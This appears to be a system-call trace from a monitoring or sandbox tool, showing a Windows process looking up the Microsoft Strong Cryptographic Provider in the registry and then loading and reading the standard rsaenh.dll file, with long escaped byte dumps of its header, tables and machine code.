| 19:40:26,313 | 252 | RegQueryValueExA |
Handle => 0x0000018c Data => Microsoft Strong Cryptographic Provider\x00 ValueName => Name |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExA |
Handle => 0x0000018c Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic Provider |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA |
Handle => 0x0000018c Data => 1 ValueName => Type |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA |
Handle => 0x0000018c DataLength => 11 ValueName => Image Path Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA |
Handle => 0x0000018c Data => rsaenh.dll\x00 ValueName => Image Path |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => rsaenh.dll |
FAILURE | 0xc0000135 | 1 time |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 1 KeyHandle => 0x00000190 ObjectAttributes => \Registry\MACHINE\System\CurrentControlSet\Control\Session Manager |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
KeyHandle => 0x00000190 ValueName => SafeProcessSearchMode |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\rsaenh.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryInformationFile |
FileHandle => 0x00000190 FileInformation => \x000\x03\x00\x00\x00\x00\x00\x00.\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000194 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013ec28 SectionHandle => 0x00000194 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\rsaenh.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000194 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013ec8c SectionHandle => 0x00000194 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x14_\xd9\x13P>\xb7@P>\xb7@P>\xb7@w\xf8\xda@H>\xb7@\x931\xb8@Y>\xb7@P>\xb6@\xc5>\xb7@\x931\xea@[>\xb7@\x931\xeb@Q>\xb7@\x931\xe9@Q>\xb7@\x931\xd7@Q>\xb7@\x931\xe8@\x7f>\xb7@\x931\xed@Q>\xb7@RichP>\xb7@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x04\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryInformationFile |
FileHandle => 0x00000190 FileInformation => P\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtSetInformationFile |
FileHandle => 0x00000190 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => \x03\x00\x00\x00\x00\x00\x04\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x000\xea\x02\x00\xbb\x02\x00\x00\xc4\xdd\x02\x00x\x00\x00\x00\x000\x03\x00P\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x03\x00\xc8\x10\x00\x00@\x12\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10e\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x008\x02\x00\x00\xbc\xdb\x02\x00\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.text\x00\x00\x00\xeb\xdc\x02\x00\x00\x10\x00\x00\x00\xde\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00`.data\x00\x00\x00 0\x00\x00\x00\xf0\x02\x00\x00*\x00\x00\x00\xe2\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0.rsrc\x00\x00\x00P\x0c\x00\x00\x000\x03\x00\x00\x0e\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => \x00\x04\x00\x08\x00\x00\x00\x08\x00\x04\x01\x00 \x04\x01\x08\x00\x00\x00\x00 \x04\x01\x00\x00\x00\x00\x08\x00\x04\x00\x00 \x00\x01\x00 \x04\x00\x08\x00\x04\x00\x00\x00\x00\x00\x00 \x04\x01\x08 \x00\x01\x08\x00\x04\x01\x08 \x04\x00\x00\x00\x00\x01\x00\x00\x04\x01\x00 \x00\x01\x08\x00\x04\x00\x08 \x04\x00\x00 \x00\x00\x00 \x04\x01\x00\x00\x00\x01\x08 \x00\x00\x08@\x00\x00\x80@\x00 \x00\x00\x00\x00\x00\x00 \x80@\x00 \x00\x00 \x00\x00@ \x00\x80\x00\x00 \x00@ \x00\x00@ \x80\x00 \x00\x00\x00\x00\x80\x00 \x00\x80@\x00\x00\x80\x00\x00 \x80@ \x00\x00\x00 \x00@ \x00\x80@\x00 \x80\x00\x00\x00\x00\x00 \x00\x00@\x00\x00\x00\x00 \x80@\x00 \x80@ \x80\x00\x00 \x80\x00\x00\x00\x80@ \x00\x00@\x00\x00\x00\x00 \x00@ \x00\x00 \x00\x80@ \x00\x00\x00\x00\x00\x80\x00 \x00\x80@ \x00\x00 \x80@\x00 \x00\x00\x00\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => '\x9e\x9e\xb9\xd9\xe1\xe18\xeb\xf8\xf8\x13+\x98\x98\xb3"\x11\x113\xd2ii\xbb\xa9\xd9\xd9p\x07\x8e\x8e\x893\x94\x94\xa7-\x9b\x9b\xb6<\x1e\x1e"\x15\x87\x87\x92\xc9\xe9\xe9 \x87\xce\xceI\xaaUU\xffP((x\xa5\xdf\xdfz\x03\x8c\x8c\x8fY\xa1\xa1\xf8 \x89\x89\x80\x1a
\x17e\xbf\xbf\xda\xd7\xe6\xe61\x84BB\xc6\xd0hh\xb8\x82AA\xc3)\x99\x99\xb0Z--w\x1e\x0f\x0f\x11{\xb0\xb0\xcb\xa8TT\xfcm\xbb\xbb\xd6,\x16\x16:\xa5\xc6cc\x84\xf8||\x99\xeeww\x8d\xf6{{
\xff\xf2\xf2\xbd\xd6kk\xb1\xdeooT\x91\xc5\xc5P`00\x03\x02\x01\x01\xa9\xcegg}V++\x19\xe7\xfe\xfeb\xb5\xd7\xd7\xe6M\xab\xab\x9a\xecvvE\x8f\xca\xca\x9d\x1f\x82\x82@\x89\xc9\xc9\x87\xfa}}\x15\xef\xfa\xfa\xeb\xb2YY\xc9\x8eGG\x0b\xfb\xf0\xf0\xecA\xad\xadg\xb3\xd4\xd4\xfd_\xa2\xa2\xeaE\xaf\xaf\xbf#\x9c\x9c\xf7S\xa4\xa4\x96\xe4rr FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => m\xd6G\x13\x9a\xd7a\x8c7\xa1\x0czY\xf8\x14\x8e\xeb\x13<\x89\xce\xa9'\xee\xb7a\xc95\xe1\x1c\xe5\xedzG\xb1<\x9c\xd2\xdfYU\xf2s?\x18\x14\xceys\xc77\xbfS\xf7\xcd\xea_\xfd\xaa[\xdf=o\x14xD\xdb\x86\xca\xaf\xf3\x81\xb9h\xc4>8$4,\xc2\xa3@_\x16\x1d\xc3r\xbc\xe2%\x0c(<I\x8b\xff
\x95A9\xa8\x01q\x08\x0c\xb3\xde\xd8\xb4\xe4\x9cdV\xc1\x90{\xcb\x84a\xd52\xb6pHl\t\xd0\xb8WBPQ\xf4\xa7S~Ae\xc3\x1a\x17\xa4\x96:'^\xcb;\xabk\xf1\x1f\x9dE\xab\xac\xfaX\x93K\xe3\x03U 0\xfa\xf6\xadvm\x91\x88\xccv%\xf5\x02L\xfcO\xe5\xd7\xd7\xc5*\xcb\x80&5D\x8f\xb5b\xa3I\xde\xb1Zg%\xba\x1b\x98E\xea\x0e\xe1]\xfe\xc0\x02\xc3/u\x12\x81L\xf0\xa3\x8dF\x97\xc6k\xd3\xf9\xe7\x03\x8f_\x95\x15\x92\x9c\xeb\xbfmz\xda\x95RY-\xd4\xbe\x83\xd3Xt!)I\xe0i FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => \xfb\x0bA.\x9a\xd7a\x8c\x94\xdel\x87\x86\xc5{\x9a\x88\xccv\x91\xa2\xf3U\xa0\xac\xfaX\xab\xbe\xe1O\xb6\xb0\xe8B\xbd\xea\x9f \xd4\xe4\x96\x04\xdf\xf6\x8d\x13\xc2\xf8\x84\x1e\xc9\xd2\xbb=\xf8\xdc\xb20\xf3\xce\xa9'\xee\xc0\xa0*\xe5zG\xb1<tN\xbc7fU\xab*h\\xa6!Bc\x85\x10Lj\x88\x1b^q\x9f\x06Px\x92
\x0f\xd9d\x04\x06\xd4o\x16\x1d\xc3r\x18\x14\xcey2+\xedH<"\xe0C.9\xf7^ 0\xfaU\xec\x9a\xb7\x01\xe2\x93\xba
\xf0\x88\xad\x17\xfe\x81\xa0\x1c\xd4\xbe\x83-\xda\xb7\x8e&\xc8\xac\x99;\xc6\xa5\x940\x9c\xd2\xdfY\x92\xdb\xd2R\x80\xc0\xc5O\x8e\xc9\xc8D\xa4\xf6\xebu\xaa\xff\xe6~\xb8\xe4\xf1c\xb6\xed\xfch\x0c
g\xb1\x02\x03j\xba\x10\x18}\xa7\x1e\x11p\xac4.S\x9d:'^\x96(<I\x8b&5D\x80|B\x0f\xe9rK\x02\xe2`P\x15\xffnY\x18\xf4Df;\xc5Jo6\xceXt!\xd3 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xce>'\xca\x07\xc2\xc0!\xc7\xb8\x86\xd1\x1e\xeb\xe0\xcd\xd6}\xda\xeax\xd1n\xee\x7fO}\xf5\xbao\x17r\xaag\xf0\x06\xa6\x98\xc8\xa2\xc5}c
\xae
\xf9\xbe\x04\x98?\x11\x1bG\x1c\x135\x0bq\x1b\x84}\x04#\xf5w\xdb(\x93$\xc7@{\xab\xca2\xbc\xbe\xc9\x15
\xbe\x9e<L
\x10\x9c\xc4g\x1dC\xb6B>\xcb\xbe\xd4\xc5L*~e\xfc\x9c)\x7fY\xec\xfa\xd6:\xabo\xcb_\x17XGJ\x8c\x19Dl\x98/\x8aB\x91D7q\xcf\xfb\xc0\xb5\xa5\xdb\xb5\xe9[\xc2V9\xf1\x11\xf1Y\xa4\x82?\x92\xd5^\x1c\xab\x98\xaa\x07\xd8\x01[\x83\x12\xbe\x851$\xc3}\x0cUt]\xber\xfe\xb1\xde\x80\xa7\x06\xdc\x9bt\xf1\x9b\xc1\xc1i\x9b\xe4\x86G\xbe\xef\xc6\x9d\xc1\x0f\xcc\xa1\x0c$o,\xe9-\xaa\x84tJ\xdc\xa9\xb0\\xda\x88\xf9vRQ>\x98m\xc61\xa8\xc8'\x03\xb0\xc7\x7fY\xbf\xf3\x0b\xe0\xc6G\x91\xa7\xd5Qc\xca\x06g))\x14\x85
\xb7' FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00\x00\x00\xffu\x18\xffu\x14\xffu\x10\xffvxVh\x90\x98\x01h\xe8\xcb\xf9\xff\xff\x85\xc0\x0f\x85\xc0\x00\x00\x009E\x10\x0f\x84\xb5\x00\x00\x00\x8bE\x0c\x85\xc0\x0f\x84\xaa\x00\x00\x00\x81x\x04\x05\x80\x00\x00\x0f\x85\x9d\x00\x00\x00\x83~`\x01\x0f\x85\x93\x00\x00\x00\x8bNxW\x8bx\x10\x8b\xd1\x83\xc7\x04\xc1\xe9\x02\x83\xc6,\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4_\xebq\xb8\x08\x00 \x80\xebp\xffu\x18\xffu\x14\xffu\x10j\x08Vh\xa0t\x01h\xeb$\xffu\x18\xffu\x14\xffu\x10j\x08Vh\xd0f\x01h\xeb\x11\xffu\x18\xffu\x14\xffu\x10j\x08Vh V\x01h\xe87\xf9\xff\xff\x85\xc0u09E\x10t)\x8bE\x0c\x85\xc0t"\x81x\x04\x05\x80\x00\x00u\x19\x83~`\x01u\x13\x8bV,\x8bH\x10\x89Q\x04\x8bV0\x89Q\x08\x83H4\x013\xc0^]\xc2\x14\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x83\xec\x14V3\xf6\xf7E\x18\xbf\xff\xff\xff\x89u FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => v\x81\xf9\x02f\x00\x00tX\x81\xf9\x03f\x00\x00t:\x81\xf9 f\x00\x00t2\x81\xf9
f\x00\x00vl\x81\xf9\x10f\x00\x00wd\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00\xffpxPh\x90\x98\x01h\xe8\xfe\xe7\xff\xff\x85\xc0tF\x8b\xf0\xebf\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00j\x08Ph\xa0t\x01h\xeb\xdd\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00j\x08Ph\xd0f\x01h\xeb\xc7\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00j\x08Ph V\x01h\xeb\xb1\x8bu\xf0\x8bE\x10\x8bU\xec\x03\xf2\x8b\xc8\x8b\xd1\xc1\xe9\x02\x8d{\x14\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x89\x033\xff3\xf6\x83}\xf4\x00t\x08\xffu\xf4\xe8\xf0\xa0\x01\x00\x8bE\xfc\x85\xc0t\x12\x83\xc0\xf8\x818Heapu\x07P\xff\x15\x1c \x03h\x8bE\xf8\x85\xc0t\x12\x83\xc0\xf8\x818Heapu\x07P\xff\x15\x1c \x03h\x8b\xc6\x8de\xe0_^[\xc9\xc2\x10\x00\xcc\xcc\xcc FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xe9\x02\xf3\xa5\x8b\xc8\x8bE\xfc\x83\xe1\x03\xf3\xa4\x8bu\x08\x03\xc3\x01E\x14\x8b}\x14\x8b\xcb\x8b\xc1\xc1\xe9\x02\xf3\xa5\x8b\xc8\x8bE\x08\x83\xe1\x03\xf3\xa4\x8bJ\x04\x8d4\x18\x8bE\x14\xc1\xe9\x03\x8d<\x18\x03}\xfc\x8b\xc1\xc1\xe9\x02\xf3\xa5\x8b\xc8\x8bE\xf4\x83\xc0\xecP\xffu\x0c\x83\xe1\x03\xf3\xa4\xe8\x9f\x91\x01\x00\x85\xc0t\x043\xc0\xeb&\x8b}\xf0\x8bu\xf43\xc0@\x8bM\x18\x899\x8bM\x10\x891\xeb\x113\xc0\xeb\xf0\x8bE\x18\x898\x8bE\x10\x8903\xc0@_[^\xc9\xc2\x14\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x8bE\x0c%\x00\xe0\x00\x00=\x00\x80\x00\x00u\x043\xc0\xeb\x1a\x8bE\x08\x8b\x80\x84\x01\x00\x00j\x00\xffu\x0c\xff4\x85(\x18\x03h\xe8c\xe1\x01\x00]\xc2\x08\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x8bE\x0c\x8bM\x14W3\xff-\x00$\x00\x00\x899t\x19-\x01(\x00\x00td\x83\xe8\x03tTHtFHtY-\xfaW\x00\x00u\x06 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xfa\x10f\x00\x00w\x05\x8bIx\xeb\x8a\x83&\x00\xebA\xc7\x06@\x00\x00\x00\xeb9\x8bM\x1c\x8bI\x10\x85\xc9u\x07\xb9
\x00 \x80\xeb:\x8bI\x08\x89\x0e\xeb!\xf7\xde\x1b\xf6\x81\xe6\xea\x00\x00\x00\x8b\xce\xeb#\x8bM\x14\x85\xc9t\x129\x18r\x0e\x8bU\x1c\x8bR\x04\x89\x11\x89\x183\xc9\xeb\x0c\xf7\xd9\x1b\xc9\x81\xe1\xea\x00\x00\x00\x89\x18_[3\xc0\x85\xc9\x0f\x94\xc0\x8b\xf0\x85\xf6u\x07Q\xff\x15\xc4\x11\x00h\x8b\xc6^]\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecSV\x8bu\x083\xc0\xf6\x06 Wt\x01@\x83}\x0c\x02u\x13\xbb\x84\x12\x00h\xbf|\x12\x00h\xc7E\x08t\x12\x00h\xeb\x17\x83}\x0c\x01uP\xbbl\x12\x00h\xbfd\x12\x00h\xc7E\x08\\x12\x00h\x83\xbeX\x01\x00\x00\x00t\x15j\x00P\xffu\x0ch\xb0\x1a\x03hV\xe8\xcb\xab\x00\x00\x85\xc0u&W\x8b=\xc4\x10\x00h\x81\xc6@\x01\x00\x00\xff6\xff\xd7\xffu\x08\xff6\xff\xd7S FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x8bu \x85\xf6t\x1d3\xc9;\xc1v\x17\x8dE\xdc+\xf0\x8dD
\xdc\x8a\x1c\x060\x18A;M\x18r\xf1\x8b]\xd8\x8b}\x08\x81\xff\x01f\x00\x00\x0f\x84\xf1\x00\x00\x00\x81\xff\x02f\x00\x00\x0f\x84\xbc\x00\x00\x00\x81\xff\x03f\x00\x00\x0f\x84\x87\x00\x00\x00\x81\xff f\x00\x00t\x7f\x81\xff
f\x00\x00vm\x81\xff\x10f\x00\x00v6;\xfaua\x8bM\x18\x8bu\xd0\x8b\xc1\xc1\xe9\x02\x83}$\x01\x8d}\xect\x03\x8bu\xd4\xf3\xa5\x8b\xc8\x8dE\xecP\xffu\x18\x83\xe1\x03S\xf3\xa4\xe8\x18\xec\x00\x00\xe9\xb2\x00\x00\x00\x83}$\x01u\x15j\x01S\x8dE\xdcP\x8dE\xecP\xe8\x8d\xea\x00\x00\xe9\x9d\x00\x00\x00j\x00S\xffu\xd4\x8dE\xecP\xe8y\xea\x00\x00\xe9\x83\x00\x00\x00\xbe\x08\x00 \x80\xe9\xc7\x00\x00\x00\x83}$\x01u\x12j\x01S\x8dE\xdcP\x8dE\xecP\xe8d\xc6\x00\x00\xebgj\x00S\xffu\xd4\x8dE\xecP\xe8S\xc6\x00\x00\xebP\x83}$\x01u FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x8dE\xf4PV\xffu\x18\xe8\xcd\xcb\xff\xff\x85\xc0\x0f\x84D\x01\x00\x009u\xf0\x8bE\xf4\x8bM\x14\x8d<\x01u\x17W\xe8@a\x01\x00\x8b\xd8;\xde\x89]\xecu\x11j\x08^\xe9\xb6\x01\x00\x00\x8b]\xf8\x83\xc3\x08\x89]\xec\x8dE\xf4PS\xffu\x18\xe8\x8a\xcb\xff\xff\x85\xc0\x0f\x84\x01\x01\x00\x009u\x10t\x1eVW\x8dE\xf4PSVj\x01V\xffu\x10\xffu\x08\xe8\xd4\xab\xff\xff;\xc6\x0f\x85\xb8\xfd\xff\xff\x83}\xf0\x00\x8bM\xf4\x8dY\x08\x0f\x85<\x01\x00\x00\x8b}\x1c\x8bu\xec\x83\xc7\x08\xe96\x01\x00\x00\x8a\x06<\x03t\x08<\x04\x0f\x85\xb2\x00\x00\x00\x8bE\xfc\x8b@\x10\x85\xc0\x0f\x84\xb8\x00\x00\x00\x8bX\x08\x8bu\x1c\x83\xc3\x07\xc1\xeb\x03\x83\xc3\x14\x85\xf6\x0f\x84\x15\x01\x00\x00\x8bM 9\x19\x0f\x82
\x01\x00\x00\x8b\x08\x8bU\xf8\x89J\x08\x8bH\x08\x89J\x0c\x8bH\x10\x89J\x10\x8bH\x08\x83\xc1\x07\xc1\xe9\x03\x8dp\x14\x8b\xc1\xc1\xe9\x02\x8d FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => k\x83E\x90\x08u2\x8b\xb5|\xff\xff\xff\x8dF\x08;\xc6r\x18P\xff\x15\x18 \x03h;\xc7\x89E\x90t\x0f\xc7\x00Heap\x83E\x90\x089}\x90u\x08j\x08[\xe9\x85\x02\x00\x00\x8d\x85|\xff\xff\xffP\x8dE\x90P\x8bE\x94\xffp\x1c\xe8\x8d\xa5\xff\xff;\xc7\x0f\x85c\xfc\xff\xff\xffu\x88\x8bE\x94\xffu\x98\xffu\x90\xffp\x1c\xe8x\xa9\xff\xff;\xc7\x0f\x85G\xfc\xff\xff\xff\xb5t\xff\xff\xff\x8dE\x9cP\xffu\x90\x8bE\x94\xffp\x1c\xe8X\xa9\xff\xff;\xc7\x0f\x85'\xfc\xff\xff\x8bE\x94\x8bx\x10\x8b\x8d|\xff\xff\xff\x8bu\x90\x8b\xc1\xc1\xe9\x02\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\x8bE\x94\x83H \x02\x8bM\x80\x8b}\x8c\x8b\xd1\xc1\xe9\x02\x8b\xb5x\xff\xff\xff3\xc0\xf3\xab\x8b\xca\x83\xe1\x03\xf3\xaa\x8bM\x88\x8b}\x98\x8b\xd1\xc1\xe9\x023\xc0\xf3\xab\x8b\xca\x83\xe1\x03\xf3\xaa\x8bE\x94VS\xffp\x10\xffp\x18\xffp\x1c\xe8\x94\xf8\xff\xff\x85\xc0\xe9\xb1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xeb\x07\xc7E\xb8p\xf0\x02h\x8bU\x143\xf6\x85\xd2v\x13\x8bE\x10\x8dD\x10\xff\x8a\x08\x88L5\xbcFH;\xf2r\xf4\x8b]\x1c\x8b\xca\x8b\xfb\x8du\xbc3\xc0\xf3\xa6t\x05\x1b\xc0\x83\xd8\xff\x85\xc0u~\xf6E\x18\x01\x8b\xca\x89M\xb4uG\x8bu\xb8\x85\xf6t@\x8b\x06\x808\x00t9\x89u\xb8\x0f\xb6\x18\x8dx\x01\x8bE\x1c\x8d4\x02\x8b\xcb3\xc0\xf3\xa6t\x05\x1b\xc0\x83\xd8\xff\x85\xc0t\x13\x83E\xb8\x04\x8bE\xb8\x8b\x00\x808\x00u\xd5\x8bM\xb4\xeb\x03\x8d\x0c\x13\x8b]\x1c\x80<\x19\x00u&\x8bE\x08\x8b@\x0c\x80<\x18\x00u\x1a\x80|\x18\xff\x01u\x13AH\xeb\x07\x80<\x19\xffu A;\xc8r\xf53\xc0\xeb\x0c\xb8\x06\x00 \x80\xeb\x05\xb8\x02\x00 \x80\x8bM\xfc_^[\xe8\x92n\x00\x00\xc9\xc2\x18\x00\x10\xdd\x00h\x19\xdd\x00h"\xdd\x00h+\xdd\x00h\x17\xde\x00h\x17\xde\x00h\x17\xde\x00h4\xdd\x00h\x17\xde\x00h\x17\xde\x00h\x17 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => _j\x06\x8dM\xc0Q\x8dM\xe4Q\xffu\xc8\x89}\xc0P\xffU\xb8;\xc3u\x06f9}\xc0t8\x83\xf82\x8bu\xcctSW\x8dE\xe4P\x8dF8P\x8dFXP\x8d\x86d\x01\x00\x00P\xe8\xb7\xe9\xff\xff;\xc3uSSj\x06W\x8dE\xe4P\xffu\xc8\xffu\xd4\xffU\xc4\xeb\x03\x8bu\xccW\xe8\x0c1\x01\x00;\xc3\x89\x86H\x01\x00\x00u\x08j\x08^\xe9\x1a\x01\x00\x00\x8du\xe4\xe9\xff\x00\x00\x00\x8dE\xd8PSSh\x03\x80\x00\x00\xffv\x0c\xe8\xd9\x86\xff\xff\x85\xc0u
\xff\x15\xc8\x11\x00h\x8b\xf0\xe9\xee\x00\x00\x00S\x8dE\xecPj\x02\xffu\xd8\xffv\x0c\xe8k\xb7\xff\xff\x85\xc0t\xdd\x8dE\xbcPj\x01\xffv\x0c\xffu\xd8\xe8\xf0$\x00\x00;\xc3t\x11= \x00 \x80u\xc7\xbe\x02\x00 \x80\xe9\xb2\x00\x00\x00\x8bE\xbc\xffu\xd0\x8b=\xbc\x11\x00h\x83`\x18\xfe\xff\xd7@P\xe8y0\x01\x00;\xc3\x89E\xe0tw\xffu\xd0P\xff\x15 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xff\xff\xff6\xe8\xcc!\x01\x00\x8bu\x18\x89\x06\x8bE\x10\xff0\xe8T!\x01\x00;\xc3\x89\x07\x0f\x84r\xff\xff\xff\xff6\xe8C!\x01\x00;\xc3\x8bM\x0c\x89\x01\x0f\x84^\xff\xff\xff\xffu\xf0\xffu\xf8h\x01\x00\x01\x00\xffu\x1cP\xff7\xe8 \xfc\x00\x00\x8b\xf0\xf7\xde\x1b\xf6\x81\xe6\xb1\xfa\xff\xff\x81\xc6O\x05\x00\x00\x8dE\xdcP\x8d\x85p\xff\xff\xffP\xe8\xfbz\x01\x00\x85\xc0u\x0e;\xf3u
\xffu\xe4\xe8\xf6F\x00\x00\x8b\xf09]\xd0t"\x8dE\xdcP\x8d\x85\xc0\xfe\xff\xffP\xe8\xaev\x01\x00\x85\xc0u\x0e;\xf3u
\xffu\xe4\xe8\xcfF\x00\x00\x8b\xf09]\xect\x08\xffu\xec\xe8\xfb \x01\x009]\xf8t\x08\xffu\xf8\xe8\xee \x01\x009]\xf0t\x08\xffu\xf0\xe8\xe1 \x01\x00;\xf3t\x1b\x8b?;\xfbt\x06W\xe8\xd1 \x01\x00\x8bE\x0c\x8b\x00;\xc3t\x06P\xe8\xc2 \x01\x00_\x8b\xc6^[\xc9\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xdbC\x89]\xa8\x8bE\x18=\x00\x04\x00\x00r0P\x8dE\xccP\x8dE\xc8P\x8dE\xc4P\x8dE\xdcP\x8dE\xe0P\xe8\\xee\xff\xff\x89E\xe4\x85\xc0\x0f\x85\xfd\x01\x00\x00\x89]\xd0\x8b}\xdc\xe9\x8f\x00\x00\x00\x89E\xa4\x8dE\xa4P\x8dE\xc8P\x8dE\xc4P\xe8\xa9\xef\x00\x00\x85\xc0u\x0c\xc7E\xe4 \x00 \x80\xe9\xce\x01\x00\x00\xffu\xc4\xe8\x01\x11\x01\x00\x89E\xe0\x85\xc0u\x0c\xc7E\xe4\x08\x00\x00\x00\xe9\xb3\x01\x00\x00\x89]\xd0\xffu\xc8\xe8L\x11\x01\x00\x89E\xccP\xe8\xda\x10\x01\x00\x8b\xf8\x89}\xdc\x85\xfft\xd7\x8d\x86d\x01\x00\x00\x838\xfft\x10\x89E\x90\xc7E\x94o\xd7\x00h\x8dE\x90\x89E\xc0h\x01\x00\x01\x00\xffu\x18W\xffu\xe0\xffu\xc0\xe8\xf2\xe8\x00\x00\x85\xc0t\x89\x8bE\xcc\x83\xc0\xecP\x8dG\x14P\xe8\x1c\x11\x01\x00\x89E\xd8\x85\xc0\x0f\x85E\x01\x00\x00PSSW\xffu\xe0\xe8s\xfc\xff\xff\x89E\xd8\x85\xc0\x0f\x85.\x01\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
